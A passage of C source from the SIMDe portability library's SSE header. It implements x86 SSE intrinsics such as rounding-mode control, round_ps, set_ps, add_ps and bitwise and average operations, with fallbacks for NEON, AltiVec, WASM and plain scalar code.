SIMDE_POWER_ALTIVEC_VECTOR(signed short),
altivec, i16)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128,
SIMDE_POWER_ALTIVEC_VECTOR(signed int),
altivec, i32)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(
m128, SIMDE_POWER_ALTIVEC_VECTOR(unsigned char), altivec, u8)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(
m128, SIMDE_POWER_ALTIVEC_VECTOR(unsigned short), altivec, u16)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128,
SIMDE_POWER_ALTIVEC_VECTOR(unsigned int),
altivec, u32)
#if defined(SIMDE_BUG_GCC_95782)
SIMDE_FUNCTION_ATTRIBUTES
SIMDE_POWER_ALTIVEC_VECTOR(float)
simde__m128_to_altivec_f32(simde__m128 value)
{
simde__m128_private r_ = simde__m128_to_private(value);
return r_.altivec_f32;
}
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde__m128_from_altivec_f32(SIMDE_POWER_ALTIVEC_VECTOR(float)
value)
{
simde__m128_private r_;
r_.altivec_f32 = value;
return simde__m128_from_private(r_);
}
#else
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128, SIMDE_POWER_ALTIVEC_VECTOR(float),
altivec, f32)
#endif
#if defined(SIMDE_POWER_ALTIVEC_P7_NATIVE)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(
m128, SIMDE_POWER_ALTIVEC_VECTOR(signed long long), altivec, i64)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(
m128, SIMDE_POWER_ALTIVEC_VECTOR(unsigned long long), altivec, u64)
#endif
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128, v128_t, wasm, v128);
#endif /* defined(SIMDE_POWER_ALTIVEC_P6_NATIVE) */
enum {
#if defined(SIMDE_X86_SSE_NATIVE)
SIMDE_MM_ROUND_NEAREST = _MM_ROUND_NEAREST,
SIMDE_MM_ROUND_DOWN = _MM_ROUND_DOWN,
SIMDE_MM_ROUND_UP = _MM_ROUND_UP,
SIMDE_MM_ROUND_TOWARD_ZERO = _MM_ROUND_TOWARD_ZERO
#else
SIMDE_MM_ROUND_NEAREST = 0x0000,
SIMDE_MM_ROUND_DOWN = 0x2000,
SIMDE_MM_ROUND_UP = 0x4000,
SIMDE_MM_ROUND_TOWARD_ZERO = 0x6000
#endif
};
#if defined(_MM_FROUND_TO_NEAREST_INT)
#define SIMDE_MM_FROUND_TO_NEAREST_INT _MM_FROUND_TO_NEAREST_INT
#define SIMDE_MM_FROUND_TO_NEG_INF _MM_FROUND_TO_NEG_INF
#define SIMDE_MM_FROUND_TO_POS_INF _MM_FROUND_TO_POS_INF
#define SIMDE_MM_FROUND_TO_ZERO _MM_FROUND_TO_ZERO
#define SIMDE_MM_FROUND_CUR_DIRECTION _MM_FROUND_CUR_DIRECTION
#define SIMDE_MM_FROUND_RAISE_EXC _MM_FROUND_RAISE_EXC
#define SIMDE_MM_FROUND_NO_EXC _MM_FROUND_NO_EXC
#else
#define SIMDE_MM_FROUND_TO_NEAREST_INT 0x00
#define SIMDE_MM_FROUND_TO_NEG_INF 0x01
#define SIMDE_MM_FROUND_TO_POS_INF 0x02
#define SIMDE_MM_FROUND_TO_ZERO 0x03
#define SIMDE_MM_FROUND_CUR_DIRECTION 0x04
#define SIMDE_MM_FROUND_RAISE_EXC 0x00
#define SIMDE_MM_FROUND_NO_EXC 0x08
#endif
#define SIMDE_MM_FROUND_NINT \
(SIMDE_MM_FROUND_TO_NEAREST_INT | SIMDE_MM_FROUND_RAISE_EXC)
#define SIMDE_MM_FROUND_FLOOR \
(SIMDE_MM_FROUND_TO_NEG_INF | SIMDE_MM_FROUND_RAISE_EXC)
#define SIMDE_MM_FROUND_CEIL \
(SIMDE_MM_FROUND_TO_POS_INF | SIMDE_MM_FROUND_RAISE_EXC)
#define SIMDE_MM_FROUND_TRUNC \
(SIMDE_MM_FROUND_TO_ZERO | SIMDE_MM_FROUND_RAISE_EXC)
#define SIMDE_MM_FROUND_RINT \
(SIMDE_MM_FROUND_CUR_DIRECTION | SIMDE_MM_FROUND_RAISE_EXC)
#define SIMDE_MM_FROUND_NEARBYINT \
(SIMDE_MM_FROUND_CUR_DIRECTION | SIMDE_MM_FROUND_NO_EXC)
#if defined(SIMDE_X86_SSE4_1_ENABLE_NATIVE_ALIASES) && \
!defined(_MM_FROUND_TO_NEAREST_INT)
#define _MM_FROUND_TO_NEAREST_INT SIMDE_MM_FROUND_TO_NEAREST_INT
#define _MM_FROUND_TO_NEG_INF SIMDE_MM_FROUND_TO_NEG_INF
#define _MM_FROUND_TO_POS_INF SIMDE_MM_FROUND_TO_POS_INF
#define _MM_FROUND_TO_ZERO SIMDE_MM_FROUND_TO_ZERO
#define _MM_FROUND_CUR_DIRECTION SIMDE_MM_FROUND_CUR_DIRECTION
#define _MM_FROUND_RAISE_EXC SIMDE_MM_FROUND_RAISE_EXC
#define _MM_FROUND_NINT SIMDE_MM_FROUND_NINT
#define _MM_FROUND_FLOOR SIMDE_MM_FROUND_FLOOR
#define _MM_FROUND_CEIL SIMDE_MM_FROUND_CEIL
#define _MM_FROUND_TRUNC SIMDE_MM_FROUND_TRUNC
#define _MM_FROUND_RINT SIMDE_MM_FROUND_RINT
#define _MM_FROUND_NEARBYINT SIMDE_MM_FROUND_NEARBYINT
#endif
SIMDE_FUNCTION_ATTRIBUTES
unsigned int SIMDE_MM_GET_ROUNDING_MODE(void)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _MM_GET_ROUNDING_MODE();
#elif defined(SIMDE_HAVE_FENV_H)
unsigned int vfe_mode;
switch (fegetround()) {
#if defined(FE_TONEAREST)
case FE_TONEAREST:
vfe_mode = SIMDE_MM_ROUND_NEAREST;
break;
#endif
#if defined(FE_TOWARDZERO)
case FE_TOWARDZERO:
vfe_mode = SIMDE_MM_ROUND_DOWN;
break;
#endif
#if defined(FE_UPWARD)
case FE_UPWARD:
vfe_mode = SIMDE_MM_ROUND_UP;
break;
#endif
#if defined(FE_DOWNWARD)
case FE_DOWNWARD:
vfe_mode = SIMDE_MM_ROUND_TOWARD_ZERO;
break;
#endif
default:
vfe_mode = SIMDE_MM_ROUND_NEAREST;
break;
}
return vfe_mode;
#else
return SIMDE_MM_ROUND_NEAREST;
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _MM_GET_ROUNDING_MODE() SIMDE_MM_GET_ROUNDING_MODE()
#endif
SIMDE_FUNCTION_ATTRIBUTES
void SIMDE_MM_SET_ROUNDING_MODE(unsigned int a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
_MM_SET_ROUNDING_MODE(a);
#elif defined(SIMDE_HAVE_FENV_H)
int fe_mode = FE_TONEAREST;
switch (a) {
#if defined(FE_TONEAREST)
case SIMDE_MM_ROUND_NEAREST:
fe_mode = FE_TONEAREST;
break;
#endif
#if defined(FE_TOWARDZERO)
case SIMDE_MM_ROUND_TOWARD_ZERO:
fe_mode = FE_TOWARDZERO;
break;
#endif
#if defined(FE_DOWNWARD)
case SIMDE_MM_ROUND_DOWN:
fe_mode = FE_DOWNWARD;
break;
#endif
#if defined(FE_UPWARD)
case SIMDE_MM_ROUND_UP:
fe_mode = FE_UPWARD;
break;
#endif
default:
return;
}
fesetround(fe_mode);
#else
(void)a;
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _MM_SET_ROUNDING_MODE(a) SIMDE_MM_SET_ROUNDING_MODE(a)
#endif
SIMDE_FUNCTION_ATTRIBUTES
uint32_t simde_mm_getcsr(void)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_getcsr();
#else
return SIMDE_MM_GET_ROUNDING_MODE();
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_getcsr() simde_mm_getcsr()
#endif
SIMDE_FUNCTION_ATTRIBUTES
void simde_mm_setcsr(uint32_t a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
_mm_setcsr(a);
#else
SIMDE_MM_SET_ROUNDING_MODE(HEDLEY_STATIC_CAST(unsigned int, a));
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_setcsr(a) simde_mm_setcsr(a)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_x_mm_round_ps(simde__m128 a, int rounding, int lax_rounding)
SIMDE_REQUIRE_CONSTANT_RANGE(rounding, 0, 15)
SIMDE_REQUIRE_CONSTANT_RANGE(lax_rounding, 0, 1)
{
simde__m128_private r_, a_ = simde__m128_to_private(a);
(void)lax_rounding;
/* For architectures which lack a current direction SIMD instruction.
*
* Note that NEON actually has a current rounding mode instruction,
* but in ARMv8+ the rounding mode is ignored and nearest is always
* used, so we treat ARMv7 as having a rounding mode but ARMv8 as
* not. */
#if defined(SIMDE_POWER_ALTIVEC_P6_NATIVE) || defined(SIMDE_ARM_NEON_A32V8)
if ((rounding & 7) == SIMDE_MM_FROUND_CUR_DIRECTION)
rounding = HEDLEY_STATIC_CAST(int, SIMDE_MM_GET_ROUNDING_MODE())
<< 13;
#endif
switch (rounding & ~SIMDE_MM_FROUND_NO_EXC) {
case SIMDE_MM_FROUND_CUR_DIRECTION:
#if defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_round(a_.altivec_f32));
#elif defined(SIMDE_ARM_NEON_A32V8_NATIVE) && !defined(SIMDE_BUG_GCC_95399)
r_.neon_f32 = vrndiq_f32(a_.neon_f32);
#elif defined(simde_math_nearbyintf)
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0]));
i++) {
r_.f32[i] = simde_math_nearbyintf(a_.f32[i]);
}
#else
HEDLEY_UNREACHABLE_RETURN(simde_mm_undefined_pd());
#endif
break;
case SIMDE_MM_FROUND_TO_NEAREST_INT:
#if defined(SIMDE_POWER_ALTIVEC_P8_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_rint(a_.altivec_f32));
#elif defined(SIMDE_ARM_NEON_A32V8_NATIVE)
r_.neon_f32 = vrndnq_f32(a_.neon_f32);
#elif defined(simde_math_roundevenf)
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0]));
i++) {
r_.f32[i] = simde_math_roundevenf(a_.f32[i]);
}
#else
HEDLEY_UNREACHABLE_RETURN(simde_mm_undefined_pd());
#endif
break;
case SIMDE_MM_FROUND_TO_NEG_INF:
#if defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_floor(a_.altivec_f32));
#elif defined(SIMDE_ARM_NEON_A32V8_NATIVE)
r_.neon_f32 = vrndmq_f32(a_.neon_f32);
#elif defined(simde_math_floorf)
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0]));
i++) {
r_.f32[i] = simde_math_floorf(a_.f32[i]);
}
#else
HEDLEY_UNREACHABLE_RETURN(simde_mm_undefined_pd());
#endif
break;
case SIMDE_MM_FROUND_TO_POS_INF:
#if defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_ceil(a_.altivec_f32));
#elif defined(SIMDE_ARM_NEON_A32V8_NATIVE)
r_.neon_f32 = vrndpq_f32(a_.neon_f32);
#elif defined(simde_math_ceilf)
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0]));
i++) {
r_.f32[i] = simde_math_ceilf(a_.f32[i]);
}
#else
HEDLEY_UNREACHABLE_RETURN(simde_mm_undefined_pd());
#endif
break;
case SIMDE_MM_FROUND_TO_ZERO:
#if defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_trunc(a_.altivec_f32));
#elif defined(SIMDE_ARM_NEON_A32V8_NATIVE)
r_.neon_f32 = vrndq_f32(a_.neon_f32);
#elif defined(simde_math_truncf)
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0]));
i++) {
r_.f32[i] = simde_math_truncf(a_.f32[i]);
}
#else
HEDLEY_UNREACHABLE_RETURN(simde_mm_undefined_pd());
#endif
break;
default:
HEDLEY_UNREACHABLE_RETURN(simde_mm_undefined_pd());
}
return simde__m128_from_private(r_);
}
#if defined(SIMDE_X86_SSE4_1_NATIVE)
#define simde_mm_round_ps(a, rounding) _mm_round_ps((a), (rounding))
#else
#define simde_mm_round_ps(a, rounding) simde_x_mm_round_ps((a), (rounding), 0)
#endif
#if defined(SIMDE_X86_SSE4_1_ENABLE_NATIVE_ALIASES)
#define _mm_round_ps(a, rounding) simde_mm_round_ps((a), (rounding))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_set_ps(simde_float32 e3, simde_float32 e2,
simde_float32 e1, simde_float32 e0)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_set_ps(e3, e2, e1, e0);
#else
simde__m128_private r_;
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
SIMDE_ALIGN_TO_16 simde_float32 data[4] = {e0, e1, e2, e3};
r_.neon_f32 = vld1q_f32(data);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_make(e0, e1, e2, e3);
#else
r_.f32[0] = e0;
r_.f32[1] = e1;
r_.f32[2] = e2;
r_.f32[3] = e3;
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_set_ps(e3, e2, e1, e0) simde_mm_set_ps(e3, e2, e1, e0)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_set_ps1(simde_float32 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_set_ps1(a);
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
return vdupq_n_f32(a);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
(void)a;
return vec_splats(a);
#else
return simde_mm_set_ps(a, a, a, a);
#endif
}
#define simde_mm_set1_ps(a) simde_mm_set_ps1(a)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_set_ps1(a) simde_mm_set_ps1(a)
#define _mm_set1_ps(a) simde_mm_set1_ps(a)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_move_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_move_ss(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 =
vsetq_lane_f32(vgetq_lane_f32(b_.neon_f32, 0), a_.neon_f32, 0);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
SIMDE_POWER_ALTIVEC_VECTOR(unsigned char)
m = {16, 17, 18, 19, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15};
r_.altivec_f32 = vec_perm(a_.altivec_f32, b_.altivec_f32, m);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_v8x16_shuffle(b_.wasm_v128, a_.wasm_v128, 0, 1, 2,
3, 20, 21, 22, 23, 24, 25, 26, 27, 28,
29, 30, 31);
#elif defined(SIMDE_SHUFFLE_VECTOR_)
r_.f32 = SIMDE_SHUFFLE_VECTOR_(32, 16, a_.f32, b_.f32, 4, 1, 2, 3);
#else
r_.f32[0] = b_.f32[0];
r_.f32[1] = a_.f32[1];
r_.f32[2] = a_.f32[2];
r_.f32[3] = a_.f32[3];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_move_ss(a, b) simde_mm_move_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_add_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_add_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vaddq_f32(a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_add(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = vec_add(a_.altivec_f32, b_.altivec_f32);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.f32 = a_.f32 + b_.f32;
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = a_.f32[i] + b_.f32[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_add_ps(a, b) simde_mm_add_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_add_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_add_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_add_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
float32_t b0 = vgetq_lane_f32(b_.neon_f32, 0);
float32x4_t value = vsetq_lane_f32(b0, vdupq_n_f32(0), 0);
// the upper values in the result must be the remnants of <a>.
r_.neon_f32 = vaddq_f32(a_.neon_f32, value);
#else
r_.f32[0] = a_.f32[0] + b_.f32[0];
r_.f32[1] = a_.f32[1];
r_.f32[2] = a_.f32[2];
r_.f32[3] = a_.f32[3];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_add_ss(a, b) simde_mm_add_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_and_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_and_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_i32 = vandq_s32(a_.neon_i32, b_.neon_i32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_v128_and(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.i32 = a_.i32 & b_.i32;
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = vec_and(a_.altivec_f32, b_.altivec_f32);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.i32) / sizeof(r_.i32[0])); i++) {
r_.i32[i] = a_.i32[i] & b_.i32[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_and_ps(a, b) simde_mm_and_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_andnot_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_andnot_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_i32 = vbicq_s32(b_.neon_i32, a_.neon_i32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_v128_andnot(b_.wasm_v128, a_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = vec_andc(b_.altivec_f32, a_.altivec_f32);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.i32 = ~a_.i32 & b_.i32;
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.i32) / sizeof(r_.i32[0])); i++) {
r_.i32[i] = ~(a_.i32[i]) & b_.i32[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_andnot_ps(a, b) simde_mm_andnot_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_xor_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_xor_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_i32 = veorq_s32(a_.neon_i32, b_.neon_i32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_v128_xor(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_i32 = vec_xor(a_.altivec_i32, b_.altivec_i32);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.i32f = a_.i32f ^ b_.i32f;
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.u32) / sizeof(r_.u32[0])); i++) {
r_.u32[i] = a_.u32[i] ^ b_.u32[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_xor_ps(a, b) simde_mm_xor_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_or_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_or_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_i32 = vorrq_s32(a_.neon_i32, b_.neon_i32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_v128_or(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_i32 = vec_or(a_.altivec_i32, b_.altivec_i32);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.i32f = a_.i32f | b_.i32f;
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.u32) / sizeof(r_.u32[0])); i++) {
r_.u32[i] = a_.u32[i] | b_.u32[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_or_ps(a, b) simde_mm_or_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_x_mm_not_ps(simde__m128 a)
{
#if defined(SIMDE_X86_AVX512VL_NATIVE)
__m128i ai = _mm_castps_si128(a);
return _mm_castsi128_ps(_mm_ternarylogic_epi32(ai, ai, ai, 0x55));
#elif defined(SIMDE_X86_SSE2_NATIVE)
/* Note: we use ints instead of floats because we don't want cmpeq
* to return false for (NaN, NaN) */
__m128i ai = _mm_castps_si128(a);
return _mm_castsi128_ps(_mm_andnot_si128(ai, _mm_cmpeq_epi32(ai, ai)));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_i32 = vmvnq_s32(a_.neon_i32);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_i32 = vec_nor(a_.altivec_i32, a_.altivec_i32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_v128_not(a_.wasm_v128);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.i32 = ~a_.i32;
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.i32) / sizeof(r_.i32[0])); i++) {
r_.i32[i] = ~(a_.i32[i]);
}
#endif
return simde__m128_from_private(r_);
#endif
}
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_x_mm_select_ps(simde__m128 a, simde__m128 b, simde__m128 mask)
{
/* This function is for when you want to blend two elements together
* according to a mask. It is similar to _mm_blendv_ps, except that
* it is undefined whether the blend is based on the highest bit in
* each lane (like blendv) or just bitwise operations. This allows
* us to implement the function efficiently everywhere.
*
* Basically, you promise that all the lanes in mask are either 0 or
* ~0. */
#if defined(SIMDE_X86_SSE4_1_NATIVE)
return _mm_blendv_ps(a, b, mask);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b),
mask_ = simde__m128_to_private(mask);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_i32 = vbslq_s32(mask_.neon_u32, b_.neon_i32, a_.neon_i32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_v128_bitselect(b_.wasm_v128, a_.wasm_v128,
mask_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_i32 =
vec_sel(a_.altivec_i32, b_.altivec_i32, mask_.altivec_u32);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.i32 = a_.i32 ^ ((a_.i32 ^ b_.i32) & mask_.i32);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.i32) / sizeof(r_.i32[0])); i++) {
r_.i32[i] = a_.i32[i] ^
((a_.i32[i] ^ b_.i32[i]) & mask_.i32[i]);
}
#endif
return simde__m128_from_private(r_);
#endif
}
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_avg_pu16(simde__m64 a, simde__m64 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_avg_pu16(a, b);
#else
simde__m64_private r_, a_ = simde__m64_to_private(a),
b_ = simde__m64_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_u16 = vrhadd_u16(b_.neon_u16, a_.neon_u16);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS) && \
defined(SIMDE_VECTOR_SUBSCRIPT_SCALAR) && \
defined(SIMDE_CONVERT_VECTOR_)
uint32_t wa SIMDE_VECTOR(16);
uint32_t wb SIMDE_VECTOR(16);
uint32_t wr SIMDE_VECTOR(16);
SIMDE_CONVERT_VECTOR_(wa, a_.u16);
SIMDE_CONVERT_VECTOR_(wb, b_.u16);
wr = (wa + wb + 1) >> 1;
SIMDE_CONVERT_VECTOR_(r_.u16, wr);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.u16) / sizeof(r_.u16[0])); i++) {
r_.u16[i] = (a_.u16[i] + b_.u16[i] + 1) >> 1;
}
#endif
return simde__m64_from_private(r_);
#endif
}
#define simde_m_pavgw(a, b) simde_mm_avg_pu16(a, b)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_avg_pu16(a, b) simde_mm_avg_pu16(a, b)
#define _m_pavgw(a, b) simde_mm_avg_pu16(a, b)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_avg_pu8(simde__m64 a, simde__m64 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_avg_pu8(a, b);
#else
simde__m64_private r_, a_ = simde__m64_to_private(a),
b_ = simde__m64_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_u8 = vrhadd_u8(b_.neon_u8, a_.neon_u8);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS) && \
defined(SIMDE_VECTOR_SUBSCRIPT_SCALAR) && \
defined(SIMDE_CONVERT_VECTOR_)
uint16_t wa SIMDE_VECTOR(16);
uint16_t wb SIMDE_VECTOR(16);
uint16_t wr SIMDE_VECTOR(16);
SIMDE_CONVERT_VECTOR_(wa, a_.u8);
SIMDE_CONVERT_VECTOR_(wb, b_.u8);
wr = (wa + wb + 1) >> 1;
SIMDE_CONVERT_VECTOR_(r_.u8, wr);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.u8) / sizeof(r_.u8[0])); i++) {
r_.u8[i] = (a_.u8[i] + b_.u8[i] + 1) >> 1;
}
#endif
return simde__m64_from_private(r_);
#endif
}
#define simde_m_pavgb(a, b) simde_mm_avg_pu8(a, b)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_avg_pu8(a, b) simde_mm_avg_pu8(a, b)
#define _m_pavgb(a, b) simde_mm_avg_pu8(a, b)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_x_mm_abs_ps(simde__m128 a)
{
#if defined(SIMDE_X86_AVX512F_NATIVE) && \
(!defined(HEDLEY_GCC_VERSION) || HEDLEY_GCC_VERSION_CHECK(7, 1, 0))
